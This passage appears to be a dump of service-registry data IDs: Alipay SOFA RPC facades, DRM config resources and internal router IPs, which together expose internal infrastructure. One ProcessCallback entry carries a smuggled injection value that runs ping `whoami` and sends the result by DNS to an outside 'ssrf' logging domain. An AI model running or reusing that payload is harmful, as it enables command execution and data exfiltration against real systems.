CertifyMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.query.api.AccenterSubReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.crowdFilterScenario,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_merchantFeeSignCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.integration.einvoice.EinvoiceRegisterServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.process.SpmProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.use.MktTradeDiscountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumecenter.common.service.facade.RecoverEventQueryFacade:1.0:finadvisorcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.SysConfigParamDrmResource.extendDataColumnSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.supportShopIdGrayConfigString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:asyncCommonTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ipsponsorprod.common.service.integration.tradeQuery.TradeQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_batch_rate_adjust@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_CREDITPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.gotonemng.common.service.api.MsgboxMktBannerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkwirelessdataportal.common.service.panda.TemplateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:updateOriginRateCallbackProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_OVERSEAS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxInteractiveTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.facade.crypto.CipherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.instrument:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.multimediabase.facade.core.SubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.finassetcore.AssetProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.ITransReceiverService:1.0:isupergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.gfcenter.common.service.facade.ArInvoiceOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrtcenter.common.service.facade.evaluation.cz.EvaluationCZQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_${eventMsg.newSpmATopic}#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finorm.finriskcenter.common.facade.api.guardian.OssDataCoreServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.AoneProjectBugFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.facade.fund.api.ProcessVoucherService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.8.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.NameListFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntComposeExchangeDepositbackHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobiledc.common.service.facade.api.LdcVipQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.common.service.facade.MrchisBrowsingHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datariskmarket.facade.RmCollectRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.zprodqueryTairCacheCZone.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:antassistant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.AlscItemAggQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.drc.rm.endpoint.facade.VpcRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finsnsbff:name=com.alipay.finsnsbff.stock.isDiscoveryDowngradeTopicsAutoFengdie,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:hyp-ol-sync-ar-tool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.service.facade.FundAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.tairConcurrent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.148.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.DataCorrectionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finannafccore.common.service.facade.headercontent.api.HeaderContentMaintenanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.WuFuServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fingiftprod.common.service.facade.gift.GoldenGiftQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:authweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.antloanmarket.service.AntLoanMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.BusinessProcessCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bigfish:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:APPLEVEL@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.ActionPacketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.isvBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.common.service.facade.BlessingDelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:fundcardprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.DecodeBIzSenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:LINGKAI_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:crmhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.personloan.api.PlctransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.32.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.26.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scardcenter.common.service.facade.OfflinepayCityDivisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.178.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.178.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.${pdcore_app_name}:name=com.alipay.fc.prodquery.common.service.ldc.drm.PdcoreZoneRouteConfigDRM.defaultGZone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.activity.FuCardEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.service.facade.api.AccountOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.oneservice.governance.api.service.GovernanceApi:1.0:dponeservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@datacaptain#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.routeclient.interfacename:crmhome#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifemng.facade.ebppgw.CommunicationConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskOperatorService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscript.common.service.facade.ScriptValidationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.${fluxconf_app_name}:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.tables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";ping `whoami`MzMwMjQ4NjktdW5pcXVlSWQtMTA0MDAzMDM0.ssrf.noble.log.lynnshare.cc;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.auth.AssetsAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.client.institution.InstitutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilediscovery.common.service.facade.onsitepay.OspMerchantQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxProfitFetchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.isv.IsvSignManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvMerchantRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINTRADECENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finpdcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aladdin.common.service.facade.RelevantSearchManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.facade.DomainActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cfmng.cfmng_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.supergw.service.facade.transaction.MessageReceiveService:1.0:ifcfeecharge_openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.trans.api.FundTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.234.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:securityexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.PayEbppBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.publiccore.common.service.facade.proxy.RzProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_192.168.0.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kgengine.common.facade.service.schema.KgSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.sp.business.BusinessApplyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.strategy.facade.MrchGrowthDeliverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.prod.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.IndustryConfigDrmControllerImpl.interceptUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mindv_scene_approve@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.ProductPoolProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:coffeepay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinsnsprod.service.facade.api.user.SecuUserSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsccalipay.jiebei.facade.service.JieBeiActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterMerchantUnionDrmResource.unionEntryGrayString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.biz.shared.moneybox.service.facade.OldMoneyBoxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.o2o.facade.MerchantInfoQueryExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.open.gw.community.api.OpenReplyGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chair-script:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.205.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.biz.dst.DstDataService:1.0:dataOfT1OfflineDataService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintranscore.common.service.facade.bank.api.BankPreAuthUserSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.CodeTemplateFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassistantmng.common.service.facade.api.IntentionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.testLaunch001:name=com.alipay.darwin.sdk.config.fetchMsg.configFetchMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrmcore.common.service.facade.service.user.UserQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.offline.api.OfflinePolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.EntityCommonOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.247.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.vega-integration-kepler:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.urlBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antpim.common.service.facade.chain.ChainBranchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.208.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.item.EmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financeprod.fund.facade.api.DepositSignCheckFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.experience.VcpExperienceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.assets.api.facade.service.PortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_payOpenAdjustCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.58.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_trans_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.developerops.facade.api.DingTalkChatGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceiveApiExtAckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.128.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.wishsavings.WishSavingsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.card.api.TopProductsByTalentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IPROFILE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapitool.facade.ugw.UnifygwServiceSecurityManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtUfrzPaytoolStyCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_PAYACC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.charge.service.facade.ChargeConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.voucher.VcpVoucherDeleteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acordercore.common.service.facade.query.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.TaxiMachineDriverCarInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.OrderAnnualAuditQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.punishcenter.common.service.facade.PunishStrategyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.43.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.streammedia:name=com.alipay.dwebupload.client.drm.DomainConfig.downloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.224.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.180.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.25.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:workOrderAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:communicate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextLoadTestTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoplaycenter.common.signtask.facade.api.SignInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.MobileGWInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.amy.service.facade.GiftQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.app.AppRelationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.deliver.DeliverFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.QuotTagManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:zmschedulerweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.eco.EcoDetectSerialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.fundCouponMaxOverPublishRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.faasset.api.net.FaNetAssetCommonTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.36.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.69.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.iriskservice.common.service.model.probe.spi.IdcPluginProbeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.datafin.biz.share.user.UserManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.profitcore.facade.AssetProfitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.LabelQueryService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:pcreditint@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.7.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilelbs.common.service.facade.stepcounter.StepCounterQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.common.ErrorLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.30.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:custinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igmatrix.common.service.facade.ConnectImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-46#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.ebppcore.facade.EbppPerformOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.aciaasconnectorcore.facade.region.RegionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.mng.ShareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppcore.client.ProductConfQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:pcreditmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-fundselling#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zparamcore_parmMntListWorkflowOperateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaggexpcore.common.service.facade.categoryitem.CategoryItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.DispatchReceiptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.1.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.explicitSetExtendKeys,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:pagedigestlog_app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialportal.web.ps.rpc.facade.dingtalk.DingTalkFacade:1.0@XFIRE#@#D